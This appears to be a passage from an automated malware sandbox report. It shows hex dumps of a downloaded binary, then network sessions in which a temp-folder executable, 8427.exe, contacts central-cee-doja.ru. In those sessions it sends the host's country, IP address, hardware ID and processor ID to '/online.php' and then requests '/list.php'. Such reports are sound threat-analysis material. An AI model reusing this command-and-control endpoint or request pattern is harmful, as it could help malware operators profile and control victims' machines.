2023-11-18 09:02:40 UTC	5460	IN	Data Raw: 00 00 ff 73 1c 89 43 14 8b d0 68 c4 8c 12 10 b9 0a 06 00 00 e8 54 05 00 00 83 c4 0c 89 44 24 14 85 c0 75 3d 85 ff 7c 39 7f 04 85 f6 74 33 3b 7c 24 0c 7c 21 7f 06 3b 74 24 10 76 19 6a ff 6a ff 8b cb e8 a6 e7 ff ff 8b 44 24 1c 83 c4 08 5f 5e 5b 8b e5 5d c3 57 56 8b cb e8 8f e7 ff ff 83 c4 08 8b 44 24 14 5f 5e 5b 8b e5 5d c3 cc 55 8b ec 83 ec 14 8b 45 14 0f 57 c0 53 8b 5d 18 8b cb 56 8b 75 10 81 e1 ff ff ff 7f 0f 11 45 ec 89 45 10 89 45 f4 8b c3 57 33 ff c1 f8 1f 89 7d fc 89 4d f8 85 f6 0f 8e d5 00 00 00 8b 45 0c 90 8d 4d ec 51 8d 4d 18 51 56 50 8b 45 08 ff 70 08 ff 15 90 1f 14 10 85 c0 75 51 ff 15 ec 1d 14 10 3b 3d dc 19 14 10 0f 8d b4 00 00 00 83 f8 05 74 24 83 f8 20 74 1f 83 f8 21 74 1a 83 f8 37 74 15 83 f8 40 74 10 83 f8 79 74 0b 3d cf 04 00 00 0f 85 8b Data Ascii: sChTD$u=\|9t3;\|$\|!;t$vjjD$_^[]WVD$_^[]UEWS]VuEEEW3}MEMQMQVPEpuQ;=t$ t!t7t@tyt=
2023-11-18 09:02:40 UTC	5540	IN	Data Raw: 4c 24 0c 8b c1 8b 4c 24 6c 5f 5e 33 cc e8 17 21 ef ff 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8d 45 10 8b 4d 08 50 e8 0e 00 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 68 a1 04 10 14 10 33 c4 89 44 24 64 56 8b 75 08 8d 44 24 1c 57 8b f9 89 44 24 0c 56 52 89 7c 24 10 8b 47 78 89 44 24 1c 8d 44 24 10 50 c7 44 24 1c 46 00 00 00 c7 44 24 24 00 00 00 00 66 c7 44 24 28 00 01 e8 cf 06 00 00 8b 4c 24 18 83 c4 0c 85 c9 74 27 8b 44 24 18 c6 04 08 00 83 7c 24 14 00 76 14 f6 44 24 1d 04 75 0d 8d 4c 24 08 e8 55 03 00 00 8b c8 eb 04 8b 4c 24 0c 80 7c 24 1c 07 75 43 80 7f 53 00 75 3d 80 7f 54 00 75 37 83 bf c8 00 00 00 00 c6 47 53 01 7e 0a c7 87 38 01 00 00 01 00 00 00 ff 87 40 01 00 00 33 c0 66 89 87 44 01 00 00 8b 87 0c 01 00 00 Data Ascii: L$L$l_^3!]UUEMP]Uh3D$dVuD$WD$VR\|$GxD$D$PD$FD$$fD$(L$t'D$\|$vD$uL$UL$\|$uCSu=Tu7GS~8@3fD
2023-11-18 09:02:40 UTC	5604	IN	Data Raw: f6 44 24 59 04 74 3c 8b 54 24 48 85 d2 74 34 8b 4c 24 44 e8 d5 e8 ff ff 5f 5e 8b e5 5d c3 85 f6 74 15 89 44 24 54 2b c6 03 44 24 48 56 51 50 e8 c9 24 f0 ff 83 c4 0c 8b 4d 08 8d 54 24 44 e8 da c2 ff ff 5f 5e 8b e5 5d c3 20 30 11 10 55 2e 11 10 43 2f 11 10 87 2f 11 10 cb 2f 11 10 6d 2e 11 10 0b 30 11 10 12 2e 11 10 2a 2e 11 10 6f 2f 11 10 9f 2f 11 10 e1 2f 11 10 93 30 11 10 00 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0c 02 0c 0c 03 0c 0c 0c 0c 0c 04 0c 0c 0c 05 0c 06 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 07 0c 08 0c 0c 0c 05 0c 0c 09 0c 0c 0c 0c 0c 0a 0c 0c 0c 0b cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec a4 00 00 00 a1 04 10 14 10 33 c4 89 84 24 a0 00 00 00 8b 45 10 8d 4c 24 04 8b Data Ascii: D$Yt<T$Ht4L$D_^]tD$T+D$HVQP$MT$D_^] 0U.C///m.0.*.o///0U3$EL$
2023-11-18 09:02:40 UTC	5716	IN	Data Raw: 39 01 00 00 66 0f 57 c0 83 c4 10 c3 66 0f 12 4c 24 08 66 0f c5 c1 03 25 00 80 00 00 83 f8 00 0f 84 18 01 00 00 66 0f 57 c0 83 c4 10 c3 f2 0f 58 e4 f2 0f 10 c4 ba ee 03 00 00 e9 6e 01 00 00 66 0f 12 14 24 66 0f 7e d0 66 0f 73 d2 20 66 0f 7e d2 81 e2 ff ff ff 7f 0b c2 b9 00 00 00 00 83 f8 00 0f 84 6b fe ff ff 66 0f 12 0d 98 d7 13 10 66 0f 12 05 d0 d7 13 10 f2 0f 59 c9 ba 1c 00 00 00 e9 28 01 00 00 66 0f 12 24 24 66 0f 12 54 24 08 66 0f 7e e0 83 f8 00 75 29 66 0f 73 d4 20 66 0f 7e e2 81 fa 00 00 f0 3f 0f 84 f3 00 00 00 81 fa 00 00 f0 bf 75 0c 66 0f 12 05 40 d7 13 10 83 c4 10 c3 66 0f 12 1d 30 d7 13 10 66 0f 57 c9 66 0f 54 da 66 0f 76 cb 66 0f d7 c1 25 ff 00 00 00 3d ff 00 00 00 75 63 66 0f c5 c2 03 66 0f 12 24 24 25 00 80 00 00 81 f1 00 00 f0 bf 0b d1 83 fa Data Ascii: 9fWfL$f%fWXnf$f~fs f~kffY(f$$fT$f~u)fs f~?uf@f0fWfTfvf%=ucff$$%
2023-11-18 09:02:40 UTC	5796	IN	Data Raw: bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac ec 3f 27 5c 1b f2 7c 23 3c 3e 00 00 00 00 00 00 f4 3f 00 00 00 24 e2 0e ed 3f ce 7d b2 64 6a 88 23 3e 00 00 00 00 00 80 f4 3f 00 00 00 cc 57 6e ed 3f d7 88 13 4d 56 78 3a 3e 00 00 00 00 00 00 f5 3f 00 00 00 2c f8 ca ed 3f 31 8d 19 38 6f 1a 2c 3e 00 00 00 00 00 80 f5 3f 00 00 00 44 dd 24 ee 3f 09 63 bd 2f ba 0a 19 3e 00 00 00 00 00 00 f6 3f 00 00 00 40 20 7c ee 3f 94 f5 78 37 7c a8 31 3e 00 00 00 00 00 80 f6 3f 00 00 00 7c d9 d0 ee 3f 1c d6 d9 1e 39 08 12 3e 00 00 00 00 00 00 f7 3f 00 00 00 70 20 23 ef 3f 8c 49 41 8d 8b 75 3d 3e 00 00 00 00 00 80 f7 3f 00 00 00 d0 0b 73 ef 3f 88 78 00 d9 b4 0f 34 3e 00 00 00 00 00 00 f8 3f 00 00 00 70 b1 c0 ef 3f 65 64 66 bf 26 c9 2e 3e 00 00 Data Ascii: G?aji9>?T\|?'\\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ \|?x7\|1>?\|?9>?p #?IAu=>?s?x4>?p?edf&.>
2023-11-18 09:02:40 UTC	5876	IN	Data Raw: 20 25 58 e6 3c 00 61 06 1d 59 ac ba 3f 5d 40 ec ba 5f 7d 9c 3c 00 f6 6e 4c b3 ec ba 3f fb bc 9c 9a 47 09 bc 3c 00 ca 0c 31 0f 2d bb 3f 61 dc e9 7f a1 28 ef 3c 00 55 14 cf 6c 6d bb 3f 69 54 09 ed 3f 91 e0 3c 00 11 bb 2a cc ad bb 3f 56 e3 cf 2a d7 fa b6 3c 00 77 37 48 2d ee bb 3f ad 16 8d 58 5b 46 b4 3c 00 06 c1 2b 90 2e bc 3f 58 8e 20 15 6b 6e e0 3c 00 45 90 d9 f4 6e bc 3f db 54 a9 28 8d 2b e5 3c 00 c6 de 55 5b af bc 3f d6 89 1b d4 06 9c e4 3c 00 27 e7 a4 c3 ef bc 3f 6a 75 21 34 b8 95 a9 3c 00 16 e5 ca 2d 30 bd 3f d6 17 a8 f7 a2 ef e1 3c 00 51 15 cc 99 70 bd 3f 05 ba e5 86 bf 8a e2 3c 00 ae b5 ac 07 b1 bd 3f 87 02 b6 98 7b dc eb 3c 00 18 05 71 77 f1 bd 3f 5f 57 a8 e4 98 f0 c9 3c 00 96 43 1d e9 31 be 3f 27 90 02 c6 fa d3 01 3c 00 49 b2 b5 5c 72 be 3f d1 ed Data Ascii: %X<aY?]@_}<nL?G<1-?a(<Ulm?iT?<?V<w7H-?X[F<+.?X kn<En?T(+<U[?<'?ju!4<-0?<Qp?<?{<qw?_W<C1?'<I\r?
2023-11-18 09:02:40 UTC	5951	IN	Data Raw: 27 65 48 db 3f 60 1f 9e 09 4a b5 4a 3d 00 10 78 0e 7e d0 db 3f 20 cf 0d 1c c2 8a 26 3d 00 10 6e ba 60 59 dc 3f fe 81 cb 96 bd b4 43 3d 00 30 91 8b 16 e1 dc 3f e2 19 5d 05 a3 ad 2f 3d 00 10 23 20 99 67 dd 3f 04 75 e8 96 50 ed 18 3d 00 c0 ff 0d e2 ec dd 3f aa 8a ed 2c 6c e2 43 3d 00 f0 35 ad eb 71 de 3f e1 95 8e e0 09 16 01 3d 00 40 44 d3 b3 f6 de 3f fa 14 16 2d 5b b3 40 3d 00 70 74 9e 34 7a df 3f 20 91 d9 81 70 6e 4a 3d 00 c0 8c 9e 6c fd df 3f 9d 69 86 2e 45 67 fa 3c 00 f0 79 7e a9 3f e0 3f ee 8b 4f e7 12 5e 27 3d 00 28 54 8d 74 80 e0 3f db 0a ce 78 3b 8c 3b 3d 00 00 cf 50 16 c1 e0 3f a5 52 11 eb 52 17 46 3d 00 80 b1 26 08 01 e1 3f 58 d2 07 8a c9 a3 4e 3d 00 e8 4a dd cc 40 e1 3f c1 d2 7e 19 da ca 1f 3d 00 48 74 3d 63 80 e1 3f 41 7a e0 07 17 55 22 3d 00 98 Data Ascii: 'eH?`JJ=x~? &=n`Y?C=0?]/=# g?uP=?,lC=5q?=@D?-[@=pt4z? pnJ=l?i.Eg<y~??O^'=(Tt?x;;=P?RRF=&?XN=J@?~=Ht=c?AzU"=
2023-11-18 09:02:40 UTC	6063	IN	Data Raw: cd d9 ff d0 3f 80 9d f1 f6 0e 35 16 3d 00 78 c2 be 2f 40 d1 3f 8b ba 22 42 20 3c 31 3d 00 90 69 19 97 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d 00 b8 3a 15 db f0 d1 3f df 0e 0c 23 2e 58 27 3d 00 48 42 4f 0e 26 d2 3f f9 1f a4 28 10 7e 15 3d 00 78 11 a6 62 62 d2 3f 12 19 0c 2e 1a b0 12 3d 00 d8 43 c0 71 98 d2 3f 79 37 9e ac 69 39 2b 3d 00 80 0b 76 c1 d5 d2 3f bf 08 0f be de ea 3a 3d 00 30 bb a7 b3 0c d3 3f 32 d8 b6 19 99 92 38 3d 00 78 9f 50 13 44 d3 3f 58 b3 12 1f 31 ef 1f 3d 00 00 00 00 00 c0 db 3f 00 00 00 00 00 c0 db 3f 00 00 00 00 00 51 db 3f 00 00 00 00 00 51 db 3f 00 00 00 00 f0 e8 da 3f 00 00 00 00 f0 e8 da 3f 00 00 00 00 e0 80 da 3f 00 00 00 00 e0 80 da 3f 00 00 00 00 c0 1f da 3f 00 00 00 00 c0 1f da 3f 00 00 Data Ascii: ?5=x/@?"B <1=iz?\-!y!=X0z?~b>==:?#.X'=HBO&?(~=xbb?.=Cq?y7i9+=v?:=0?28=xPD?X1=??Q?Q???????
2023-11-18 09:02:40 UTC	6143	IN	Data Raw: 73 20 6f 6e 6c 79 20 61 6c 6c 6f 77 65 64 20 6f 6e 20 61 6e 20 49 4e 54 45 47 45 52 20 50 52 49 4d 41 52 59 20 4b 45 59 00 76 69 72 74 75 61 6c 20 74 61 62 6c 65 73 20 63 61 6e 6e 6f 74 20 75 73 65 20 63 6f 6d 70 75 74 65 64 20 63 6f 6c 75 6d 6e 73 00 00 76 69 72 74 75 61 6c 00 73 74 6f 72 65 64 00 00 65 72 72 6f 72 20 69 6e 20 67 65 6e 65 72 61 74 65 64 20 63 6f 6c 75 6d 6e 20 22 25 73 22 00 00 2c 00 00 00 0a 20 20 00 2c 0a 20 20 00 00 00 00 0a 29 00 00 43 52 45 41 54 45 20 54 41 42 4c 45 20 00 00 00 20 54 45 58 54 00 00 00 20 4e 55 4d 00 00 00 00 20 49 4e 54 00 00 00 00 20 52 45 41 4c 00 00 00 75 6e 6b 6e 6f 77 6e 20 64 61 74 61 74 79 70 65 20 66 6f 72 20 25 73 2e 25 73 3a 20 22 25 73 22 00 00 00 00 6d 69 73 73 69 6e 67 20 64 61 74 61 74 79 70 65 20 66 Data Ascii: s only allowed on an INTEGER PRIMARY KEYvirtual tables cannot use computed columnsvirtualstorederror in generated column "%s", , )CREATE TABLE TEXT NUM INT REALunknown datatype for %s.%s: "%s"missing datatype f
2023-11-18 09:02:40 UTC	6167	IN	Data Raw: 73 65 67 64 69 72 27 20 57 48 45 52 45 20 6c 65 76 65 6c 20 42 45 54 57 45 45 4e 20 3f 20 41 4e 44 20 3f 00 00 53 45 4c 45 43 54 20 3f 20 55 4e 49 4f 4e 20 53 45 4c 45 43 54 20 6c 65 76 65 6c 20 2f 20 28 31 30 32 34 20 2a 20 3f 29 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 00 00 00 00 53 45 4c 45 43 54 20 6c 65 76 65 6c 2c 20 63 6f 75 6e 74 28 2a 29 20 41 53 20 63 6e 74 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 20 20 20 47 52 4f 55 50 20 42 59 20 6c 65 76 65 6c 20 48 41 56 49 4e 47 20 63 6e 74 3e 3d 3f 20 20 4f 52 44 45 52 20 42 59 20 28 6c 65 76 65 6c 20 25 25 20 31 30 32 34 29 20 41 53 43 2c 20 32 20 44 45 53 43 20 4c 49 4d 49 54 20 31 00 00 53 45 4c 45 43 54 20 32 20 2a 20 74 6f 74 61 6c 28 31 20 2b 20 6c 65 61 76 65 Data Ascii: segdir' WHERE level BETWEEN ? AND ?SELECT ? UNION SELECT level / (1024 * ?) FROM %Q.'%q_segdir'SELECT level, count() AS cnt FROM %Q.'%q_segdir' GROUP BY level HAVING cnt>=? ORDER BY (level %% 1024) ASC, 2 DESC LIMIT 1SELECT 2 total(1 + leave
2023-11-18 09:02:40 UTC	6247	IN	Data Raw: 00 da 03 39 03 1a 05 d9 00 5a 02 fa 04 7a 01 8f 07 da 09 cf 02 fa 16 39 00 3a 01 39 00 da 06 19 01 fa 0d 39 00 1a 12 fa 0c 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 cf 03 9a 05 b9 00 36 00 32 00 f9 03 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 19 02 1a 20 79 10 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 f9 07 36 00 32 00 36 00 32 00 19 04 36 00 32 00 59 20 1a 06 b9 02 5a 00 d9 00 5a 01 e9 05 e5 05 7e 00 49 00 45 00 fe 00 69 00 25 00 5e 00 25 00 5e 00 a5 00 46 00 69 00 25 00 5e 0c 25 00 da 00 9e 00 6c 00 5e 00 95 00 2f 00 55 00 c5 04 25 00 25 00 07 07 26 00 35 00 2c 00 e7 02 e7 00 e7 00 e7 00 e7 00 e7 00 e7 00 Data Ascii: 9Zz9:9962626262626262626262626262 y6262626262626262626262626262Y ZZ~IEi%^%^Fi%^%l^/U%%&5,
2023-11-18 09:02:40 UTC	6263	IN	Data Raw: 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 01 00 00 01 01 00 00 01 00 01 00 01 01 00 01 00 00 01 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
2023-11-18 09:02:40 UTC	6279	IN	Data Raw: 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 00 00 02 00 01 00 62 00 00 00 00 00 00 00 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 00 00 00 01 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 00 00 00 00 0a 0a 09 09 08 08 07 07 07 06 06 06 05 05 05 04 04 04 04 03 03 03 03 03 03 02 02 02 02 02 02 02 10 10 02 10 01 08 20 00 00 00 00 00 00 00 00 00 a0 c7 12 10 a8 c7 12 10 b0 c7 12 10 63 63 63 63 7c 7c 7c 7c 77 77 77 77 7b 7b 7b 7b f2 f2 Data Ascii: >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>b0123456789abcdef cccc\|\|\|\|wwww{{{{
2023-11-18 09:02:40 UTC	6295	IN	Data Raw: 38 39 62 37 35 34 61 63 63 64 37 63 64 64 66 00 5f 53 49 39 62 66 34 36 31 64 62 39 62 66 38 33 63 32 32 40 38 00 53 49 39 63 36 64 37 63 64 37 62 37 64 33 38 30 35 35 00 53 49 39 63 62 37 36 39 32 66 36 31 39 39 38 34 38 35 00 5f 53 49 39 65 61 34 39 32 37 36 64 63 66 39 38 34 39 66 40 31 32 00 53 49 61 30 36 39 64 61 37 36 39 36 38 62 37 35 35 33 00 53 49 61 30 66 39 64 64 31 31 35 38 63 62 66 62 30 63 00 5f 53 49 61 31 64 37 65 32 31 61 35 34 38 62 39 31 30 63 40 34 00 53 49 61 32 36 62 38 65 35 31 31 36 62 37 64 39 33 62 00 53 49 61 32 61 36 30 35 30 61 38 64 62 64 33 62 37 61 00 53 49 61 33 34 30 31 65 39 38 63 62 61 64 36 37 33 65 00 53 49 61 33 66 37 62 33 31 31 39 30 63 65 30 38 31 35 00 53 49 61 36 31 38 65 37 66 31 65 39 35 62 35 63 33 32 00 53 Data Ascii: 89b754accd7cddf_SI9bf461db9bf83c22@8SI9c6d7cd7b7d38055SI9cb7692f61998485_SI9ea49276dcf9849f@12SIa069da76968b7553SIa0f9dd1158cbfb0c_SIa1d7e21a548b910c@4SIa26b8e5116b7d93bSIa2a6050a8dbd3b7aSIa3401e98cbad673eSIa3f7b31190ce0815SIa618e7f1e95b5c32S
2023-11-18 09:02:40 UTC	6311	IN	Data Raw: 00 ae 01 00 00 e4 04 00 00 00 00 00 00 44 06 34 00 00 00 56 00 53 00 5f 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e 00 5f 00 49 00 4e 00 46 00 4f 00 00 00 00 00 bd 04 ef fe 00 00 01 00 00 00 01 00 05 00 73 00 00 00 01 00 05 00 73 00 3f 00 00 00 00 00 00 00 04 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a2 05 00 00 01 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 7e 05 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 5a 00 1d 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 48 00 69 00 70 00 70 00 2c 00 20 00 57 00 79 00 72 00 69 00 63 00 6b 00 20 00 26 00 20 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 2c 00 20 00 49 00 6e 00 63 00 2e 00 00 00 Data Ascii: D4VS_VERSION_INFOss?StringFileInfo~040904b0ZCompanyNameHipp, Wyrick & Company, Inc.
2023-11-18 09:02:40 UTC	6327	IN	Data Raw: 35 15 35 23 35 29 35 32 35 39 35 3e 35 50 35 c7 37 cf 37 da 37 e4 37 ea 37 f3 37 fa 37 ff 37 0d 38 24 38 7d 38 ba 38 c9 38 d2 38 92 39 9a 39 a8 39 b6 39 c0 39 c6 39 cf 39 d6 39 db 39 e9 39 f2 39 f7 39 04 3a 12 3a 1c 3a 22 3a 2b 3a 32 3a 37 3a 45 3a 4e 3a 53 3a 64 3a 72 3a 7c 3a 82 3a 8b 3a 92 3a 97 3a a5 3a ae 3a b3 3a c4 3a d2 3a dc 3a e2 3a eb 3a f2 3a f7 3a 05 3b 0e 3b 13 3b 28 3b 36 3b 40 3b 46 3b 4f 3b 56 3b 5b 3b 6d 3b 7c 3b 8b 3b 90 3b b2 3b c0 3b ca 3b d0 3b d9 3b e0 3b e5 3b f3 3b fc 3b 01 3c 0e 3c 1c 3c 26 3c 2c 3c 35 3c 3c 3c 41 3c 4f 3c 58 3c d8 3c dc 3c e0 3c e4 3c e8 3c ec 3c f0 3c f4 3c 1b 3d 66 3d d5 3d df 3d e4 3d 17 3e 49 3e 0f 3f 19 3f 1e 3f 58 3f df 3f 00 00 00 30 07 00 28 01 00 00 9d 32 b2 32 d3 32 f9 32 12 33 1a 33 25 33 2f 33 35 33 Data Ascii: 55#5)52595>5P5777777778$8}8888999999999999:::":+:2:7:E:N:S:d:r:\|:::::::::::::::;;;(;6;@;F;O;V;[;m;\|;;;;;;;;;;;;<<<&<,<5<<<A<O<X<<<<<<<<<=f====>I>???X??0(222233%3/353
2023-11-18 09:02:40 UTC	6343	IN	Data Raw: 30 74 30 7c 30 84 30 8c 30 94 30 9c 30 a4 30 ac 30 b4 30 bc 30 c4 30 cc 30 d4 30 dc 30 e4 30 ec 30 f4 30 fc 30 04 31 0c 31 14 31 1c 31 24 31 2c 31 34 31 3c 31 44 31 4c 31 54 31 5c 31 64 31 6c 31 74 31 7c 31 84 31 8c 31 94 31 9c 31 a4 31 ac 31 b4 31 bc 31 c4 31 cc 31 d4 31 dc 31 e4 31 ec 31 f4 31 fc 31 04 32 0c 32 14 32 1c 32 24 32 2c 32 34 32 3c 32 44 32 4c 32 54 32 5c 32 64 32 6c 32 74 32 7c 32 84 32 8c 32 94 32 9c 32 a4 32 ac 32 b4 32 bc 32 c4 32 cc 32 d4 32 dc 32 e4 32 ec 32 f4 32 fc 32 04 33 0c 33 14 33 1c 33 24 33 2c 33 34 33 3c 33 44 33 4c 33 54 33 5c 33 64 33 6c 33 74 33 7c 33 84 33 8c 33 94 33 9c 33 a4 33 ac 33 b4 33 bc 33 c4 33 cc 33 d4 33 dc 33 e4 33 ec 33 f4 33 fc 33 04 34 0c 34 14 34 1c 34 24 34 2c 34 34 34 3c 34 44 34 4c 34 54 34 5c 34 64 34 Data Ascii: 0t0\|000000000000000001111$1,141<1D1L1T1\1d1l1t1\|111111111111111112222$2,242<2D2L2T2\2d2l2t2\|222222222222222223333$3,343<3D3L3T3\3d3l3t3\|333333333333333334444$4,444<4D4L4T4\4d4
2023-11-18 09:02:40 UTC	6359	IN	Data Raw: 2f 44 69 67 69 43 65 72 74 54 72 75 73 74 65 64 47 34 43 6f 64 65 53 69 67 6e 69 6e 67 52 53 41 34 30 39 36 53 48 41 33 38 34 32 30 32 31 43 41 31 2e 63 72 6c 30 3d 06 03 55 1d 20 04 36 30 34 30 32 06 05 67 81 0c 01 03 30 29 30 27 06 08 2b 06 01 05 05 07 02 01 16 1b 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 43 50 53 30 81 94 06 08 2b 06 01 05 05 07 01 01 04 81 87 30 81 84 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 5c 06 08 2b 06 01 05 05 07 30 02 86 50 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 69 43 65 72 74 54 72 75 73 74 65 64 47 34 43 6f 64 65 53 69 67 6e 69 6e 67 52 53 41 34 30 39 36 53 48 41 33 38 Data Ascii: /DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=U 60402g0)0'+http://www.digicert.com/CPS0+00$+0http://ocsp.digicert.com0\+0Phttp://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA38

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.4	49844	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:27 UTC	10700	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:27 UTC	10700	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6mwfqcOIEO1wEwPdD0EZfyOIuxPKQurMXLhDqhzBajyCM5Aoe5YJ0yX%2FWimjlPdNOxC814AXuTB2W9E%2BfiWVBuOJ3lhKuGyShCCQN1A0gvA4lhqca%2BbTQ7c4RsPCgec1sUApj7Jv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a54798830b7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:27 UTC	10700	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:27 UTC	10700	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	104.21.89.193	443	192.168.2.4	49844	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:27 UTC	10700	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:27 UTC	10700	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6mwfqcOIEO1wEwPdD0EZfyOIuxPKQurMXLhDqhzBajyCM5Aoe5YJ0yX%2FWimjlPdNOxC814AXuTB2W9E%2BfiWVBuOJ3lhKuGyShCCQN1A0gvA4lhqca%2BbTQ7c4RsPCgec1sUApj7Jv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a54798830b7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:27 UTC	10700	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:27 UTC	10700	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.4	49845	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:28 UTC	10700	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
